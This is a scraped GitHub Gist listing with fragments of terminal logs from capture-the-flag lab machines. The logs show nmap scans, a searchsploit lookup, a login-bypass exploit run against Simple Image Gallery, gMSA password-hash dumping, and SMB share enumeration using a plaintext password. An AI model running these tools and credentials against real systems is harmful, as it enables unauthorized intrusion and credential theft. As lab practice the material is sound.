oxtd
/ TCP-scan.sh
Created
March 12, 2022 06:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ export IP=10.10.11.118 | |
| $ sudo nmap -sC -sV -oA Nmap/all-ports-detail $IP -p- --min-rate 10000 | |
| Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-12 12:24 IST | |
| Nmap scan report for 10.10.11.118 | |
| Host is up (0.24s latency). | |
| Not shown: 65532 closed tcp ports (reset) | |
| PORT STATE SERVICE VERSION | |
| 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www-data@gallery:/var/www/html/gallery/uploads$ ls -al /home/mike/ | |
| total 44 | |
| drwxr-xr-x 6 mike mike 4096 Aug 25 09:15 . | |
| drwxr-xr-x 4 root root 4096 May 20 2021 .. | |
| -rw------- 1 mike mike 135 May 24 2021 .bash_history | |
| -rw-r--r-- 1 mike mike 220 Apr 4 2018 .bash_logout | |
| -rw-r--r-- 1 mike mike 3772 May 20 2021 .bashrc | |
| drwx------ 3 mike mike 4096 May 20 2021 .gnupg | |
| drwxrwxr-x 3 mike mike 4096 Aug 25 09:15 .local | |
| -rw-r--r-- 1 mike mike 807 Apr 4 2018 .profile |
oxtd
/ exploit.sh
Created
February 12, 2022 12:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python3 50214.py -h | |
| TARGET = http://10.10.88.176:8080/ | |
| Login Bypass | |
| shell name TagomalglnzfaacrtnzLetta | |
| protecting user | |
| User ID : 1 | |
| Firsname : Adminstrator | |
| Lasname : Admin |
oxtd
/ searchsploit.sh
Created
February 12, 2022 12:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ searchsploit Simple Image Gallery | |
| ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- | |
| Exploit Title | Path | |
| ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- | |
| Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ sudo nmap -sC -sV -oA Nmap/all-tcp 10.10.88.176 -p- --min-rate 10000 | |
| Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-12 17:54 IST | |
| Warning: 10.10.88.176 giving up on port because retransmission cap hit (10). | |
| Nmap scan report for 10.10.88.176 | |
| Host is up (0.39s latency). | |
| Not shown: 65123 closed tcp ports (reset), 410 filtered tcp ports (no-response) | |
| PORT STATE SERVICE VERSION | |
| 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | |
| |_http-server-header: Apache/2.4.29 (Ubuntu) | |
| |_http-title: Apache2 Ubuntu Default Page: It works |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python3 gMSADumper.py -u Sierra.Frye -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb | |
| Users or groups who can read password for BIR-ADFS-GMSA$: | |
| > ITSec | |
| BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| smb: \sierra.frye\> dir Downloads\Backups\ | |
| . DHc 0 Tue Aug 11 02:09:17 2020 | |
| .. DHc 0 Tue Aug 11 02:09:17 2020 | |
| search-RESEARCH-CA.p12 Ac 2643 Fri Jul 31 20:34:11 2020 | |
| staff.pfx Ac 4326 Tue Aug 11 02:09:17 2020 | |
| 3246079 blocks of size 4096. 618917 blocks available |
oxtd
/ user-flag.sh
Created
February 4, 2022 18:10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ cat user.txt | |
| de5*****************98a1c0e |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ smbclient //$IP/RedirectedFolders$ -U Sierra.Frye | |
| Enter WORKGROUP\Sierra.Frye's password: | |
| Try "help" to get a list of possible commands. | |
| smb: \> smb: \> cd sierra.frye\ | |
| smb: \sierra.frye\> dir | |
| . Dc 0 Thu Nov 18 06:31:46 2021 | |
| .. Dc 0 Thu Nov 18 06:31:46 2021 | |
| Desktop DRc 0 Thu Nov 18 06:38:00 2021 | |
| Documents DRc 0 Fri Jul 31 20:12:19 2020 | |
| Downloads DRc 0 Fri Jul 31 20:15:36 2020 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ crackmapexec smb $IP -u Sierra.Frye -p '$$49=wide=STRAIGHT=jordan=28$$18' --shares | |
| SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False) | |
| SMB 10.10.11.129 445 RESEARCH [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18 | |
| SMB 10.10.11.129 445 RESEARCH [+] Enumerated shares | |
| SMB 10.10.11.129 445 RESEARCH Share Permissions Remark | |
| SMB 10.10.11.129 445 RESEARCH ----- ----------- ------ | |
| SMB 10.10.11.129 445 RESEARCH ADMIN$ Remote Admin | |
| SMB 10.10.11.129 445 RESEARCH C$ Default share | |
| SMB 10.10.11.129 445 RESEARCH CertEnroll READ Active Directory Certificate Services share | |
| SMB 10.10.11.129 445 RESEARCH helpdesk |